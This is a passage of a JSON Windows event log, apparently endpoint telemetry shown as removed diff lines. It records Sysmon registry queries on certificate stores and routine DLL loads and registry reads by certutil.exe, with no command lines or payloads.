"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573498550000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573498550000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573498860000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573498860000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499640000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499640000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499950016, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - 